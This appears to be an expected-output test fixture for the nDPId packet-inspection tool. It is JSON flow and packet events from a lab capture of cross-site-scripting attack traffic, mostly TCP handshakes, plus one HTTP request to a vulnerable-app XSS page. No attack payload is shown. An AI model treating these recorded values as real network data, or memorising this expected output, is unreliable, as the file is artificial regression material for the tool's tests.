+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347877292,"flow_last_seen":1499347877292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347877292,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1499347877292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t4hAAD4GDkisEAABwKgKMoNiAFCEB9ewAAAAAKACchAeJQAAAgQFtAQCCAoBPGA4AAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":2,"flow_last_seen":1499347877292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg2I\/o2nZhAfXsaAScSA\/9QAAAgQFtAQCCAoD5jGsATxgOAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":3,"flow_last_seen":1499347877293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347877293,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t4lAAD4GDk+sEAABwKgKMoNiAFCEB9exP6Np2oAQAOXe\/AAAAQEICgE8YDgD5jGs"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347878568,"flow_last_seen":1499347878568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347878568,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1499347878568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347878568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UNxAAD4GdPSsEAABwKgKMoNwAFDv6DGrAAAAAKACchBW\/AAAAgQFtAQCCAoBPGF3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7577,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":2,"flow_last_seen":1499347878568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347878568,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg3Dm1iqC7+gxrKAScSAPsQAAAgQFtAQCCAoD5jLrATxhdwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":3,"flow_last_seen":1499347878568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347878568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UN1AAD4GdPusEAABwKgKMoNwAFDv6DGs5tYqg4AQAOWuuAAAAQEICgE8YXcD5jLr"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347881141,"flow_last_seen":1499347881141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347881141,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1499347881141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347881141,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80HhAAD4G9VesEAABwKgKMoOKAFDzHbOCAAAAAKACchDPUgAAAgQFtAQCCAoBPGP6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7598,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":2,"flow_last_seen":1499347881141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347881141,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg4pPHZMl8x2zg6AScSC0mgAAAgQFtAQCCAoD5jVuATxj+gEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":3,"flow_last_seen":1499347881142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347881142,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00HlAAD4G9V6sEAABwKgKMoOKAFDzHbODTx2TJoAQAOVTogAAAQEICgE8Y\/oD5jVu"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347882404,"flow_last_seen":1499347882404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347882404,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1499347882404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347882404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eWdAAD4GTGmsEAABwKgKMoOYAFA4phxRAAAAAKACchAfsgAAAgQFtAQCCAoBPGU2AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":2,"flow_last_seen":1499347882404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347882404,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg5hCgWTIOKYcUqAScSA+twAAAgQFtAQCCAoD5jaqATxlNgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":3,"flow_last_seen":1499347882404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347882404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eWhAAD4GTHCsEAABwKgKMoOYAFA4phxSQoFkyYAQAOXdvgAAAQEICgE8ZTYD5jaq"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347883693,"flow_last_seen":1499347883693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347883693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1499347883693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347883693,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WYNAAD4GbE2sEAABwKgKMoOmAFDBWz\/7AAAAAKACchByAgAAAgQFtAQCCAoBPGZ4AAAAAAEDAwc="} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":2,"flow_last_seen":1499347883693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347883693,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg6YJ\/gJMwVs\/\/KAScSAqxQAAAgQFtAQCCAoD5jfsATxmeAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":3,"flow_last_seen":1499347883694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347883694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WYRAAD4GbFSsEAABwKgKMoOmAFDBWz\/8Cf4CTYAQAOXJzAAAAQEICgE8ZngD5jfs"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347886296,"flow_last_seen":1499347886296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347886296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1499347886296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347886296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8J3NAAD4Gnl2sEAABwKgKMoPAAFDfgE5wAAAAAKACchBCwwAAAgQFtAQCCAoBPGkDAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7637,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":2,"flow_last_seen":1499347886296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347886296,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg8DWbqB034BOcaAScSCOYQAAAgQFtAQCCAoD5jp3ATxpAwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":3,"flow_last_seen":1499347886297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347886297,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0J3RAAD4GnmSsEAABwKgKMoPAAFDfgE5x1m6gdYAQAOUtaQAAAQEICgE8aQMD5jp3"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347887572,"flow_last_seen":1499347887572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347887572,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1499347887572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347887572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vidAAD4GB6msEAABwKgKMoPOAFDy3tRlAAAAAKACchCoIgAAAgQFtAQCCAoBPGpCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7649,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":2,"flow_last_seen":1499347887572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347887572,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg85IicNz8t7UZqAScSBdaAAAAgQFtAQCCAoD5ju2ATxqQgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7650,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":3,"flow_last_seen":1499347887572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347887572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vihAAD4GB7CsEAABwKgKMoPOAFDy3tRmSInDdIAQAOX8bwAAAQEICgE8akID5ju2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347890192,"flow_last_seen":1499347890192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347890192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1499347890192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347890192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gVNAAD4GRH2sEAABwKgKMoPoAFBPU+2CAAAAAKACchAv6AAAAgQFtAQCCAoBPGzRAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":2,"flow_last_seen":1499347890192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347890192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg+hXA92bT1Ptg6AScSC5\/AAAAgQFtAQCCAoD5j5FATxs0QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":3,"flow_last_seen":1499347890193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347890193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gVRAAD4GRISsEAABwKgKMoPoAFBPU+2DVwPdnIAQAOVZBAAAAQEICgE8bNED5j5F"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347891536,"flow_last_seen":1499347891536,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347891536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1499347891536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347891536,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JsNAAD4Gnw2sEAABwKgKMoP2AFBiQUjiAAAAAKACchDAPAAAAgQFtAQCCAoBPG4hAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":2,"flow_last_seen":1499347891536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347891536,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg\/bwNNpHYkFI46AScSCzIwAAAgQFtAQCCAoD5j+VATxuIQEDAwc="} 